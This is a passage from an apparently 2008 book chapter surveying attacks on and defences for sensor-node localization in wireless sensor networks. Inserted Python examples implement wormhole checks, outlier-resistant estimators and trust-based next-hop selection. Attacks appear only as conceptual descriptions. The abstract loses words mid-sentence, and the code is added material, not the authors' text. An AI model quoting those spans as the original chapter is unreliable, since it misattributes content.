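    by the three GETAR metrics: normalised remaining distance, energy deficit and
    risk = 1 - trust.  (None, None) means every progressing neighbour is
    distrusted: the case the chapter raises against RGR, where a node surrounded
    by misbehaving nodes has no next hop left.
    """
    my_dist = math.hypot(self_pos[0] - dest[0], self_pos[1] - dest[1])
    best: Optional[Tuple[float, str]] = None
    for n in neighbors:
        d = math.hypot(n.pos[0] - dest[0], n.pos[1] - dest[1])
        if d >= my_dist:                # greedy forwarding set: must be closer to dest
            continue
        t = n.rep.trust()
        if t < trust_threshold:
            continue
        cost = w_dist * (d / my_dist) + w_energy * (1.0 - n.energy) + w_risk * (1.0 - t)
        if best is None or (cost, n.node_id) < best:
            best = (cost, n.node_id)
    return (None, None) if best is None else (best[1], best[0])


def example_neighbors() -> List[Neighbor]:
    """Constructed neighbourhood of a sender at (0, 0) forwarding toward (10, 0)."""
    a = Neighbor("A", (3.0, 0.0), energy=0.9)      # honest, well supplied
    b = Neighbor("B", (4.0, 0.0), energy=0.8)      # closest to dest but drops packets
    c = Neighbor("C", (2.0, 1.0), energy=0.3)      # honest but low on energy
    d = Neighbor("D", (-2.0, 0.0), energy=1.0)     # behind the sender: no progress
    for outcome in [True] * 10: a.rep.observe(outcome)
    for outcome in [True, True] + [False] * 8: b.rep.observe(outcome)
    for outcome in [True] * 6 + [False]: c.rep.observe(outcome)
    return [a, b, c, d]


def run_example() -> dict:
    """Run two scenarios: a mixed neighbourhood and an all-misbehaving one."""
    sender, dest = (0.0, 0.0), (10.0, 0.0)
    neighbors = example_neighbors()
    chosen, cost = select_next_hop(sender, dest, neighbors)
    bad = [Neighbor(f"X{i}", (float(i + 1), 0.0), energy=1.0) for i in range(3)]
    for n in bad:                       # every progressing neighbour seen dropping
        for _ in range(5):
            n.rep.observe(False)
    isolated, _ = select_next_hop(sender, dest, bad)
    return {"chosen": chosen, "cost": round(cost, 4),
            "trust": {n.node_id: round(n.rep.trust(), 4) for n in neighbors},
            "isolated": isolated}
```

`run_example()` picks A (trusted, well supplied) over B (closer to the destination but distrusted) and C (trusted but low on energy), and returns `None` for the all-misbehaving neighbourhood, the situation the chapter notes RGR leaves without a next hop.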




Chapter XXXVII
Localization Security in Wireless
Sensor Networks
Yawen Wei
Iowa State University, USA

Zhen Yu
Iowa State University, USA

Yong Guan
Iowa State University, USA

AbstrAct

Localization of sensor nodes is very important for many applications proposed for wireless sensor
networks (WSN), such as environment monitoring, geographical routing, and target tracking. Because
sensor networks may be deployed in hostile environments, localization approaches can be compromised
by many malicious attacks. The adversaries can broadcast corrupted location informa
jam or modify the transmitting signals between sensors to mislead them to obtain incorrect distance
measurements or nonexistent connectivity links. All these malicious attacks will cause sensors not able
to or wrongly estimate their locations. In this chapter, we summarize the threat models and provide a
comprehensive survey and taxonomy of existing secure localization and verification schemes in wireless sensor networks.

INTRODUCTION

In recent years, the availability of low-cost, low-power, multifunctional, small-size autonomous devices equipped with various sensors has expedited the development of wireless sensor networks (WSN). Wireless sensor networks have both military applications (e.g., battlefield surveillance) and civilian applications (e.g., environment and habitat monitoring, target tracking, seismic detection, smart-home automation, and traffic control). To facilitate the cooperation between sensors and achieve different application goals, network and application protocols such as routing protocol, data

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Localization Security in Wireless Sensor Networks

aggregation algorithm, and localization algorithm need to be properly designed.

Among these research issues, localization of sensor nodes is very important to some applications. For example, in environment surveillance applications, a sensor must report its location to the monitoring center when it detects some enemy force (e.g., a tank); in geographical routing protocol, a sensor should know the locations of its neighbors and forwards data packets to the neighbor who is closest to the destination.

Traditional localization approaches require the sensor nodes to equip with expensive global positioning system (GPS) devices, which are not affordable in some cases, especially in large-scale sensor networks. Hence, many localization schemes (Bahl & Padmanabhan, 2000; Bulusu, Heidemann, & Estrin, 2000; Doherty, Pister, & Ghaoui, 2001; Fang, Du, & Ning, 2005; Harter, Hopper, Steggles, Ward, & Webster, 1999; He, Huang, Blum, Stankovic, & Abdelzaher, 2003; Lazos & Poovendran, 2004; Nicolescu & Nath, 2001, 2003; Priyantha, Chakraborty, & Balakrishnan, 2000; Savvides, Han, & Srivastava, 2001; Shang, Ruml, Zhang, & Fromherz, 2003; Smith, Balakrishnan, Goraczko, & Priyantha, 2004) have been proposed. These schemes assume that some special sensor nodes (named anchors) can obtain their absolute locations through GPS device. Thus other sensors can use the measured distance or connectivity information between them and the beacon messages sent from the anchors to calculate their locations.

When sensor networks are deployed in hostile environments, localization approaches are vulnerable to many malicious attacks. For example, the adversaries can compromise a sensor node and send out false location information to disturb the localization of other nodes. Sensor nodes are constrained by limited energy resources, memory resource, computation ability, and communication bandwidth, therefore, traditional cryptography mechanisms such as a public key system cannot be applied to wireless sensor networks. Moreover, localization approaches utilize the physical features of the transmitting signals between sensors (e.g., transmitting time or signal strength), thus they are vulnerable to many localization-specific attacks (e.g., distance-modification attack) that cannot be prevented by traditional security mechanisms. All these attacks can cause the sensors to be not able to or wrongly estimate their locations.

In this chapter, we provide a comprehensive survey and taxonomy of existing countermeasures that secure the localization in wireless sensor networks. We classify the secure countermeasures into secure localization schemes, which enhance sensors’ attack-resistant ability, and location verification schemes, which verify sensors’ locations (accept the correct location estimations and discard the abnormal ones) after the sensors have obtained their locations. We also classify these secure localization (or verification) schemes on whether they use precise (with nanosecond precision) time-measuring hardware, sectored antenna, or not use any special hardware.

The rest of chapter is organized as following: In the following section, we take an overview and give a classification of current localization approaches. We describe the threat models, and we provide the taxonomy of existing secure localization approaches. Finally, we discuss some future trends and conclude the chapter.

BACKGROUND: LOCALIZATION IN WIRELESS SENSOR NETWORKS

In recent years, many localization approaches have been proposed for wireless sensor networks. Before we talk about the security issues, let us take an overview of the localization systems and the techniques involved in different localization approaches.

The most traditional and widely-used localization system is the global positioning system. The earth-based GPS receivers can provide users with location, speed, and time by calculating the distances from at least three satellites. However, it is not feasible to equip the relatively expensive GPS receiver on each node in large scale sensor networks. Most localization algorithms assume that only a fraction of sensor nodes in the field can obtain their locations through GPS receivers (or


through manual configurations). These nodes are called anchors and serve as location references for other nodes to localize. Depending on the availability of such anchors, we classify the localization approaches as anchor-based or anchor-free ones. We also classify them into range-based or range-free ones on whether they require distance measurements between sensors, and centralized or distributed on whether the localization is performed by a computing center or by sensors themselves. The classification is given in Table 1, where “(c)” means that the approach is centralized.

Table 1. Classification of localization approaches

Anchor-Based, Range-Based: Active Bat(c) (Harter et al., 1999); RADAR(c) (Bahl & Padmanabhan, 2000); AHLoS (Savvides, Han, & Srivastava, 2001); LMS/KF (Smith et al., 2004); SDP(c) (So & Yu, 2005)
Anchor-Based, Range-Free: Active Badge(c) (Want et al., 1992); Centroid (Bulusu et al., 2000); Cricket (Priyantha et al., 2000); Convex(c) (Doherty et al., 2001); DV-hop (Nicolescu & Nath, 2001); DV-based AoA (Nicolescu & Nath, 2003); APIT (He et al., 2003); Amorphous (Nagpal, Shrobe, & Bachrach, 2003); SeRLoc (Lazos & Poovendran, 2004)
Anchor-Free, Range-Based: MDS-MAP(c) (Shang et al., 2003)
Anchor-Free, Range-Free: MDS-MAP(c) (Shang et al., 2003); Deployment Knowledge (Fang, Du, & Ning, 2005)

Anchor-Based Range-Based Approaches

In anchor-based localization approaches, some anchors are deployed whose positions are known from GPS device or manual configuration. In range-based approaches, the sensors’ locations are determined by using trilateration technique based on the distances between sensors. The trilateration method solves a set of equations and estimates sensor’s location that best satisfy the distance constraints (according to some optimization criteria, e.g., least square error criteria). Active Bat (Harter et al., 1999), RADAR (Bahl & Padmanabhan, 2000), AHLoS (Savvides et al., 2001), and SDP (So & Yu, 2005) are all anchor-based range-based approaches. Besides the least mean square criteria, Kalman-filter (KF) and least mean square (LMS) (Smith et al., 2004) can also be applied to obtain the optimal solution for sensors’ location.

Anchor-Based Range-Free Approaches

Since range-based approaches require special hardware to measure the distances between sensor nodes, range-free approaches attracted more research interests recently. In anchor-based range-free approaches, no distance measurements are needed and sensors determine their locations using the beacon messages from anchors. Both Active Badge (Want et al., 1992) and Cricket (Priyantha et al., 2000) belong to this category. Centroid method (Bulusu et al., 2000) calculates a sensor’s location as the mean value of the locations of anchors from which this sensor hears beacon messages. APIT (He et al., 2003) determines some triangles in which a sensor may reside, and estimates the sensor’s location as the overlapping region of these triangles. SeRLoc (Lazos & Poovendran, 2004) uses sectored antennas equipped on anchors and computes sensor’s location as the centroid of the overlapping region of multiple sectors. DV-hop (Nicolescu & Nath, 2001) and DV-based AoA (Nicolescu & Nath, 2003) first obtain the hop


counts from sensors to anchors by flooding through the sensor field, then estimate the average hop distance and translate the hop-count distances to real distances to determine sensors’ locations. Amorphous (Nagpal et al., 2003) employs a similar strategy as DV-hop but estimates the average hop distance offline. Convex (Doherty et al., 2001) utilizes a linear programming (LP) method to solve the linear equations and obtain the optimal solutions for the sensors’ locations.

Anchor-Free Range-Based Approaches

There are relatively fewer anchor-free range-based localization approaches. One is MDS-MAP (Shang et al., 2003), which is based on multidimensional scaling technique to derive the locations of all sensors. It can also work as a range-free approach when only using the connectivity information between sensors instead of the distance measurements, which may cause some degradations of the localization performance.

Anchor-Free Range-Free Approaches

MDS-MAP (Shang et al., 2003) is a centralized anchor-free range-free localization approach. Besides, Fang et al. (2005) proposed a decentralized approach, which assumed that sensors are deployed in groups and the sensors in the same group can land in different locations following a known probability distribution. With this prior deployment knowledge, a sensor utilizes the observation of the group memberships of its neighbors, and utilizes the maximum likelihood estimation method to determine its location.

THREATS TO LOCALIZATION APPROACHES

Since sensor networks may be deployed in hostile environments, the localization approaches are subject to many malicious attacks. In this section, we classify and discuss the possible attacks launched to the current localization approaches.

Attackers can compromise anchors or sensors and send out false location information. They can jam the communications between sensors and replay the messages, which makes sensors wrongly estimate the time-of-flight value and obtain wrong distance measurements. They can strengthen or weaken the signal strength, which also makes the sensors obtain wrong distance measurements. Finally, the attackers can use a wired link (called wormhole) to transmit messages received from one location and broadcast at the other location, thus making sensors build nonexistent neighboring connectivity, which results in wrong estimations of the sensors’ locations.

We can classify the attackers into internal attackers and external attackers. An internal attacker can compromise a sensor, obtain its key materials, and authenticate itself to others. An external attacker cannot obtain any cryptographic secrets or authenticate itself, but it can corrupt the physical features of the communications between sensors, for example, they can corrupt the distance measurements or neighboring connectivity by jamming the communications between sensors. In Table 2, we list the threat models and the corresponding attackers that can launch the threat models. We then describe them in more details in the following subsections.

Fake Location

Fake location information can be generated by the internal attackers who compromise sensors and authenticate themselves as legitimate ones. The impact of this attack is twofold. First, many location-based applications such as environment monitoring and target tracking will be fooled by the wrong location of some specific events, for example, high-temperature area and location of an enemy tank. Second, other sensors’ locations will be polluted if they refer to these fake locations when localizing themselves.

Wormhole

Wormhole attack was first discussed by Hu, Perrig, and Johnson (2003). In the wormhole attack, the

adversaries copy the messages heard at one location and replay them at another location.

Table 2. Classification of threat models

                     Fake Location   Wormhole   Range Enlargement   Range Reduction
Internal Attackers        X             -              X                  X
External Attackers        -             X              X                  X

Figure 1. A wormhole attack on sensor localization (the figure shows sensor s with its possible estimated positions s’ and s’’, anchors A1 and A2, the wormhole end points B and C, and the transmission range R)

Figure 1 illustrates how a wormhole attack can damage a sensor’s localization. As shown in the figure, sensor s can directly hear the beacon message of anchor A1, but not of anchor A2. To attack the localization of s, an adversary establishes a wormhole between position B and C, which are near A2 and s, respectively. Then, the adversary records A2’s beacon message at position B, transmits it through the wormhole tunnel, and replays it at position C. If s determines its location only based on A2’s beacon message, it may assume it is near anchor A2 (at some location within the transmission region of A2). If it uses both messages of A1 and A2, it may either believe it is located somewhere between A1 and A2 (e.g., at location s’’) or it may not be able to determine its location at all because it is not expected to receive the beacon messages from two anchors so far away from each other.

In such a wormhole attack, the adversaries do not need to compromise any sensor or anchor to understand the meaning of the messages, they just copy and transmit the messages through the established wormhole tunnel to corrupt the localization approaches.

Range Enlargement and Reduction

The range modification attacks are detrimental in range-based localization approaches. (1) If a time-of-flight method is used to estimate distance, external attackers can jam and replay the signal or transmit it through multipaths to prolong the transmitting time (range enlargement attack). Or they can speed-up the signals to shorten the transmitting time (range reduction attack). For example, they transform the ultrasound signal into radio frequency signal whose transmitting speed is faster, and transform the signal back to ultrasound and broadcast the signals at the end point. Internal attackers can fully control the compromised sensors, thus they may hold on to the signal for a short period of time before transmitting to launch a range enlargement attack. (2) If a signal strength method is used to estimate distance, external attacker can jam and strengthen or weaken the signal before replaying it; internal attackers can directly broadcast signals with strengthened or weakened signals.
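As an added example (not code from the chapter or from any of the cited papers), the wormhole scenario of Figure 1 run through the consistency checks that the taxonomy section below describes: the temporal and geographical packet leashes of Hu, Perrig, and Johnson (2003), the 2R range violation property of SeRLoc, and the opposite-zone rule of Hu and Evans (2003). The coordinates, the 20 m range, the tunnel delay, the clock and position errors, and the six-zone antenna are all constructed assumptions.

```python
import math
from itertools import combinations

SPEED_OF_LIGHT = 299_792_458.0  # m/s: a radio beacon covers 20 m in about 67 ns


def temporal_leash_ok(send_time, recv_time, max_range, clock_error):
    """Temporal packet leash (Hu, Perrig, & Johnson, 2003): accept a packet only
    if its age is consistent with a direct radio hop of at most max_range;
    clock_error is the assumed synchronization error in seconds. The tiny
    budget is why the chapter says hundreds-of-nanoseconds sync is required."""
    age = recv_time - send_time
    return age <= max_range / SPEED_OF_LIGHT + clock_error


def geographic_leash_ok(sender_pos, receiver_pos, max_range, position_error):
    """Geographical packet leash: a sender farther away than the radio range
    (plus position error) cannot be a direct neighbour. The verdict is only as
    good as receiver_pos, the weakness the chapter points out when the attack
    targets localization itself."""
    return math.dist(sender_pos, receiver_pos) <= max_range + position_error


def range_violation(anchors, radio_range):
    """SeRLoc communication range violation property (Lazos & Poovendran, 2004):
    two anchors both heard directly by one sensor can be at most 2R apart.
    anchors maps an anchor id to its beaconed position. Returns the first
    offending pair or None."""
    for (id_a, pos_a), (id_b, pos_b) in combinations(anchors.items(), 2):
        if math.dist(pos_a, pos_b) > 2 * radio_range:
            return (id_a, id_b)
    return None


def zones_opposite(recv_zone, send_zone, n_zones):
    """Hu & Evans (2003) directional antenna rule: with N aligned zones numbered
    1..N, a message a true neighbour sends from zone j must arrive in the zone
    opposite to j (Zone 4 and Zone 1 in the chapter's Figure 2 when N = 6)."""
    opposite = ((send_zone - 1 + n_zones // 2) % n_zones) + 1
    return recv_zone == opposite


def analyze_figure1_scenario():
    """Constructed numbers for Figure 1: sensor s hears anchor A1 directly and
    anchor A2 only through a wormhole whose exit C is 5 m away from s."""
    radio_range = 20.0      # R in metres (assumed)
    clock_error = 1e-7      # 100 ns synchronization error (assumed)
    a1, a2, s = (0.0, 0.0), (100.0, 0.0), (15.0, 0.0)
    tunnel_delay = 2e-6     # wired forwarding plus replay, assumed 2 microseconds
    direct_arrival = math.dist(a1, s) / SPEED_OF_LIGHT
    replayed_arrival = tunnel_delay + 5.0 / SPEED_OF_LIGHT
    return {
        "a1_beacon_temporal_leash": temporal_leash_ok(0.0, direct_arrival, radio_range, clock_error),
        "a2_beacon_temporal_leash": temporal_leash_ok(0.0, replayed_arrival, radio_range, clock_error),
        # only meaningful if s already holds a trustworthy position of its own
        "a2_beacon_geographic_leash": geographic_leash_ok(a2, s, radio_range, 1.0),
        "range_violation_pair": range_violation({"A1": a1, "A2": a2}, radio_range),
    }


if __name__ == "__main__":
    for check, verdict in analyze_figure1_scenario().items():
        print(f"{check}: {verdict}")
    print("zone 4 -> zone 1 with N=6 is a direct neighbour:", zones_opposite(1, 4, 6))
```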


A TAXONOMY OF SECURE MECHANISMS

In recent years, many secure mechanisms have been proposed to defend against the attacks to localization in wireless sensor networks. We provide a taxonomy in Table 3. Secure location schemes can help the sensors to correctly localize themselves; location verification schemes can detect and discard abnormal locations of sensors after their locations have been determined. We classify these secure mechanisms on whether they use delicate hardware, directional antenna, or no special hardware. In the following subsections, we discuss each category of the secure mechanisms in more details.

Table 3. A taxonomy of secure localization and location verification schemes

Delicate hardware required
  Secure localization schemes against wormholes: Packet Leashes (Hu et al., 2003)
  Location verification schemes: Distance-bounding (Brands & Chaum, 1993); Claim (Sastry, Shankar, & Wagner, 2003); Verifiable Multilateration(L) (Capkun & Hubaux, 2005); Covert Base-station (Capkun, Cagalj, & Srivastava, 2006)
Sector antenna required
  Secure localization schemes against wormholes: Sectored antenna (Hu & Evans, 2003); SeRLoc (Lazos & Poovendran, 2004)
No special hardware required
  Secure localization schemes against all attacks: MMSE-Outlier (Liu, Ning, & Du, 2005); LMS-Outlier (Li, Trappe, Zhang, & Nath, 2005); COTA (Wei, Yu, & Guan, 2006)
  Location verification schemes: LAD(L) (Du, Fang, & Ning, 2005); PLV (Ekici, McNair, & Al-Abri, 2006)

Secure Localization Schemes Against Wormholes

Hu et al. (2003) propose the first work called packet leashes to defend against wormhole attacks. In their work, a temporal packet leash is established by restricting an upper bound on the lifetime of a packet. When receiving a packet, the receiver checks if it has been expired and discards the expired packets that are transmitted through wormholes and incur long processing and transmitting time. A geographical packet leash is established by calculating the distance between two sensors’ geographical positions. The receiver can recognize the wormhole packets that travel a distance longer than a certain threshold. In the temporal leash, highly precise synchronization (hundreds of nanoseconds) is required, since a radio signal travels at the speed of light and the mutual distance between sensors are of only several meters. In the geographical leash, correct geographical locations are necessary, thus it cannot be used to defend against wormhole attacks that make the sensors’ locations not trustworthy.

Hu and Evans (2003) utilize sector antennas equipped on sensors to detect wormholes. They assume that each antenna has N equally divided zones (numbered from 1 to N). A sensor listens to the carrier in omnimode, and receives signals through the zone in which the signal power is maximal. By using a magnetic needle, it can be ensured that the antenna zones of the same number (e.g., zone of number 1) on all sensors face the same direction. In Figure 2, we see that the signals between true neighbors are sent and received in the opposite zones (e.g., Zone 4 and Zone 1). Therefore, if a sensor receives a message in Zone i, and the message is sent from Zone j of the sender node, and i and j are not opposite to each other, we can detect that messages may be transmitted through some wormholes. Besides this basic detecting method, the authors propose a verified-neighbor-discovery protocol and a strict-neighbor-discovery protocol to detect the sophisticated wormholes. These protocols require some potential verifier nodes to help a sensor to distinguish legitimate neighbors from the wormhole ones. Thus the lack of sufficient verifier nodes will result in the loss of some legitimate connectivity links and degradation of the localization performance.

Figure 2. Detect wormholes using sector antennas

Lazos and Poovendran (2004) propose another secure localization scheme called SeRLoc that also uses sectored antennas. An anchor transmits different beacons at each antenna sector containing the anchor’s location and the angles of the antenna boundary lines. Each sensor determines its location as the center of gravity of the overlapping region of all sectors it hears. During this localization process, wormholes can be detected using two properties: the sector uniqueness property and the communication range violation property. If two sectors of a single anchor are heard, or if two anchors heard by the sensor have a mutual distance greater than 2R (R is the communication range), the sensor can detect that it is under wormhole attacks. After detecting the wormhole, the sensor broadcasts a random nonce and identifies the closest anchor, Li, by the first reply, then takes the center of gravity closest to Li as its estimated location. This technique is named attach to closer locator algorithm (ACLA). One problem of ACLA is that innocent packets may sometimes arrive later than the ones through wormholes because the communications are unreliable in reality and the messages may need to be retransmitted multiple times before the receiver can actually receive them.

Secure Localization Schemes Against All Attacks

All malicious attacks to localization including fake locations, wormholes, and range modifications have a common feature: they all provide inconsistent location references, namely, the sending sensor’s location and the measured distance between the sender and the receiver are inconsistent. Therefore, some experts suggested using statistical outlier-removing methods to filter out inconsistent references.

Liu et al. (2005) take the mean square error (MSE) as an indicator of the degree of inconsistency among location references. They propose a greedy algorithm that starts with the set of all location references, and each time considers the subsets with one fewer reference and chooses one subset with the least MSE as the input to the next round, until the MSE value drops below a reasonable threshold. This scheme can effectively enhance sensors’ attack-resistant ability, but it launches relatively high computation overheads on sensors. Another problem is that it requires benign references to be the majority among all location references, and may not work well when corrupted location references collude together and take a larger percentage (e.g., around 50%) among all references.

Instead of identifying and eliminating inconsistent references before localization, Li et al. (2005) propose a scheme that lives with these inconsistent references and estimates reasonable locations for sensors using least median of the squares (LMS) technique. LMS is one of the most commonly used robust fitting algorithms and can tolerate up to 50% outliers among the total references. Since the exact LMS solutions are computationally prohibitive, the authors adopted an efficient alternative technique (Rousseeuw & Leroy, 2003) to first get several candidate reference subsets, then choose the one with the least median squares to estimate a sensor’s location.
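As an added example (not code from the chapter or from either cited paper), the two outlier-resistant estimators just described run on constructed location references: a linearized least-squares multilateration helper (the trilateration step of the range-based approaches), the greedy MSE-driven reference removal of Liu et al. (2005), and the least median of squares estimate of Li et al. (2005). The anchor coordinates, the one range-enlarged reference, the 0.01 MSE threshold, and the use of every three-reference subset in place of the paper's sampled candidate subsets are all assumptions.

```python
import math
from itertools import combinations

# Constructed references (anchor_x, anchor_y, measured_distance): four benign
# anchors around a sensor really at (3, 4) plus one corrupted reference
# (index 4) whose distance was enlarged from about 2.24 to 9.0, as a replay
# or range enlargement attack would do.
TRUE_POSITION = (3.0, 4.0)
REFERENCES = [
    (0.0, 0.0, math.dist((0.0, 0.0), TRUE_POSITION)),
    (10.0, 0.0, math.dist((10.0, 0.0), TRUE_POSITION)),
    (0.0, 10.0, math.dist((0.0, 10.0), TRUE_POSITION)),
    (10.0, 10.0, math.dist((10.0, 10.0), TRUE_POSITION)),
    (5.0, 5.0, 9.0),
]


def least_squares_position(refs):
    """Linearized 2-D least-squares multilateration. Subtracting the first
    circle equation from the others yields linear rows a*x + b*y = c, solved
    through the 2x2 normal equations. Returns None for fewer than three
    references or a degenerate (e.g. collinear) anchor set."""
    if len(refs) < 3:
        return None
    x0, y0, d0 = refs[0]
    rows = []
    for ax, ay, d in refs[1:]:
        a = 2.0 * (ax - x0)
        b = 2.0 * (ay - y0)
        c = d0 ** 2 - d ** 2 + ax ** 2 - x0 ** 2 + ay ** 2 - y0 ** 2
        rows.append((a, b, c))
    saa = sum(a * a for a, _, _ in rows)
    sab = sum(a * b for a, b, _ in rows)
    sbb = sum(b * b for _, b, _ in rows)
    sac = sum(a * c for a, _, c in rows)
    sbc = sum(b * c for _, b, c in rows)
    det = saa * sbb - sab * sab
    if abs(det) < 1e-9:
        return None
    return ((sac * sbb - sab * sbc) / det, (saa * sbc - sab * sac) / det)


def mean_square_error(pos, refs):
    """Liu et al.'s inconsistency indicator: mean squared gap between the
    distances implied by pos and the measured distances."""
    x, y = pos
    return sum((math.hypot(ax - x, ay - y) - d) ** 2 for ax, ay, d in refs) / len(refs)


def greedy_mmse_localization(refs, threshold):
    """Greedy removal of Liu et al. (2005): while the MSE of the current set
    exceeds threshold, drop the one reference whose removal leaves the least
    MSE. Stops at three references (assumed floor for a 2-D fix).
    Returns (estimate, kept_indices)."""
    kept = list(range(len(refs)))
    while True:
        current = [refs[i] for i in kept]
        pos = least_squares_position(current)
        if pos is None or len(kept) <= 3 or mean_square_error(pos, current) <= threshold:
            return pos, kept
        best_mse, best_subset = None, None
        for drop in kept:
            subset = [i for i in kept if i != drop]
            cand = least_squares_position([refs[i] for i in subset])
            if cand is None:
                continue
            mse = mean_square_error(cand, [refs[i] for i in subset])
            if best_mse is None or mse < best_mse:
                best_mse, best_subset = mse, subset
        if best_subset is None:
            return pos, kept
        kept = best_subset


def lms_localization(refs, subset_size=3):
    """Least median of squares (Li et al., 2005): fit a candidate position from
    each small subset and keep the candidate whose median squared residual
    over ALL references is smallest, so up to half the references can be
    corrupted without moving the answer. Exhaustive subsets stand in here
    for the random sampling the paper uses on larger reference sets."""
    best_median, best_pos = None, None
    for subset in combinations(refs, subset_size):
        cand = least_squares_position(list(subset))
        if cand is None:  # e.g. three collinear anchors such as (0,0),(5,5),(10,10)
            continue
        x, y = cand
        squares = sorted((math.hypot(ax - x, ay - y) - d) ** 2 for ax, ay, d in refs)
        median = squares[len(squares) // 2]
        if best_median is None or median < best_median:
            best_median, best_pos = median, cand
    return best_pos


if __name__ == "__main__":
    print("plain least squares, corrupted reference included:", least_squares_position(REFERENCES))
    print("greedy MMSE (estimate, kept indices):", greedy_mmse_localization(REFERENCES, 0.01))
    print("LMS estimate:", lms_localization(REFERENCES))
```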


Both of the above schemes try to prevent sensors from wrongly localizing themselves, however, when a sensor fails to filter out the inconsistent references, its corrupted location would “pollute” the localization of many downstream sensors and cascade through the entire sensor network. Wei, Yu, and Guan (2006) propose a scheme named COTA that uses confidence tags to identify spurious localizations of sensors. COTA consists of a tag generation process and a reference filtering process. In the tag generation phase, two methods (the statistic indicator and the geographical indicator) can be used to calculate the sensors’ confidence tags based on the positions of their neighbors, distance measurements, and the confidence tags of their neighbors. In the reference filtering phase, bad references can be filtered out by comparing their confidence tags to the absolute and relative metrics. COTA can effectively prevent the proliferation of location errors in the sensor field.

Location Verification Schemes

Although many secure localization schemes have been proposed to provide robust localization performance, they require special hardware or assume some limitations on the adversaries’ abilities, and cannot guarantee that all sensors can calculate correct location estimations. Moreover, a compromised sensor (internal attacker) can directly report corrupted locations to the base station; meanwhile it provides a correct location to its neighbors and cannot be detected. These corrupted locations can cause severe consequences to many location-based applications. For example, wrong locations of enemy force will make the surveillance center not able to locate or track the real target, and thus the location verification is a necessary second-line to defend against the adversaries. Note that some verification schemes can also be used as secure localization schemes if sensors’ locations have not been determined, and we denote them by “(L)” in Table 3.

Verification Using Special Hardware

The location verification problem was first introduced by Sastry et al. (2003), where the authors propose the echo protocol to verify if a device is inside some specific region (e.g., a room or a football stadium) to facilitate location-based access control. Their protocol is very simple in that the verifier node sends a packet containing a nonce using RF and the device echoes the packet back using ultrasound. Then by checking the packet transmission time and the processing delay, the verifier can verify if the device locates inside the circle region centered at the verifier.

If RF time-of-flight method can be used to measure distance, distance-bounding protocol (Brands & Chaum, 1993) can upper bound the measured distance from one device to another. The important assumption of this protocol is that the device can bound its xor processing to a few nanoseconds and the verifier can measure time with nanosecond precision. Based on this distance-bounding protocol, Capkun and Hubaux (2005) propose a location verification scheme for wireless sensor networks using a verifiable multilateration (VM) technique. The rationale behind VM technique is that when a sensor claims to locate somewhere within a triangle region formed by three verifiers, then its location can be verified only when all three distances from the sensor to the verifiers are consistent with the calculated ones. The limitations of the VM technique are the requirement of delicate hardware to perform distance-bounding protocol and the requirement of dense deployment of verifiers.

Lazos, Poovendran, and Capkun (2005) propose a secure localization and verification system called ROPE, which combines the secure properties of the verifiable multilateration technique (Capkun & Hubaux, 2005) and SeRLoc (Lazos & Poovendran, 2004).

Capkun et al. (2006) propose a verification scheme using covert base stations. The covert base stations (CBS) are silent to the on-going communications and their positions are only known to the verification infrastructure. Upon receiving location messages from a sensor, several CBS cooperate (through wired links) and check if their location is consistent with the difference of time-of-arrival to each CBS. Because sensors do not know the positions of CBS, their success rate to achieve consistency through guessing is


very small. A mobile base station (MBS) can also play the role of verifier, by sending a verification request from one location, moving, and waiting for the response at a different location. Therefore, at the time of performing verification, a sensor does not know the positions of the MBS.

Verification Without Special Hardware

Unlike other verification schemes that use some special hardware, Du et al. (2005) propose a scheme that verifies sensors’ locations by checking the consistency of the reported locations with the deployment knowledge. They assume that all sensors are deployed in groups (each group has a unique group ID) following a known probability distribution. A sensor’s location can be verified only when its neighborhood observation is consistent with that derived from the deployment knowledge. The difference between this scheme and the previous works is that in this scheme, the sensors are verified if their locations are within an anomaly degree from their true locations, rather than exactly at the true locations.

Recently, Ekici et al. (2006) proposed a probabilistic location verification (PLV) algorithm to verify sensors’ locations in densely deployed sensor networks. PLV explores the probabilistic relation between the number of hops a packet traverses to reach a destination and the Euclidean distance between source and destination. Then the verifier can determine plausibility (between 0 and 1) and create a trust level for each sensor’s location claim.

FUTURE TRENDS

Although various secure mechanisms have been proposed for localization in wireless sensor networks, there is still a large space for future improvements.

First, very few works have been done to secure range-free localization approaches which deserve more research efforts. For example, in DV-hop approach, if the adversaries compromise a single node and send out a false hop count, then all downstream nodes will be influenced to estimate false hop counts from them to the anchor, resulting in a biased estimation of the average hop-distance.

Another issue is that current location verification schemes either verify if a sensor exactly locates at its claimed location, or verify if it locates within the anomaly degree of its true location. However, verification regions can be arbitrary and should be related to the specific application. For example, in a military surveillance application, the monitoring center decides to project a missile at the location reported by the sensor who detects the enemy force, thus it should determine a specific verification region in which the detecting sensor should reside to guarantee that the target can be destroyed.

CONCLUSION

In this chapter, we provide a taxonomy of the research efforts devoted to secure localization in wireless sensor networks. We classify them into secure localization schemes that aim to provide correct location estimations for sensors at the front-line, and location verification schemes that aim to detect abnormal locations of sensors at the second-line, that is, after sensors’ locations have been determined using any other (insecure or secure) localization approaches. We also classify the security localization mechanisms on whether they require any special hardware. Generally, localization for sensor networks becomes more robust with the availability of more advanced hardware, for example, sectored antennas, fast processing hardware, or even nanosecond-precision clocks. If there is no such special hardware, other information such as deployment knowledge is needed to detect the inconsistent information injected by adversaries.

REFERENCES

Bahl, P., & Padmanabhan, V. N. (2000). RADAR: An in-building RF-based user location and tracking system. Paper presented at the IEEE Conference on Computer Communications (INFOCOM).


Brands, S., & Chaum, D. (1993). Distance-bounding protocols. Theory and application of cryptographic techniques (pp. 344-359).

Bulusu, N., Heidemann, J., & Estrin, D. (2000). GPS-less low cost outdoor localization for very small devices. IEEE Personal Communications, 7(5), 284.

Capkun, S., Cagalj, M., & Srivastava, M. (2006). Secure localization with hidden and mobile base stations. Paper presented at the IEEE Conference on Computer Communications (INFOCOM).

Capkun, S., & Hubaux, J. (2005). Secure positioning of wireless devices with application to sensor networks. Paper presented at the IEEE Conference on Computer Communications (INFOCOM).

Doherty, L., Pister, K. S., & Ghaoui, L. (2001). Convex position estimation in wireless sensor networks. Paper presented at the IEEE Conference on Computer Communications (INFOCOM).

Du, W., Fang, L., & Ning, P. (2005). LAD: Localization anomaly detection for wireless sensor networks. In Proceedings of IEEE International Parallel and Distributed Processing Symposium (IPDPS).

Ekici, E., McNair, J., & Al-Abri, D. (2006). A probabilistic approach to location verification in wireless sensor networks. In Proceedings of IEEE International Conference on Communications (ICC).

Fang, L., Du, W., & Ning, P. (2005). A beacon-less location discovery scheme for wireless sensor networks. Paper presented at the IEEE Conference on Computer Communications (INFOCOM).

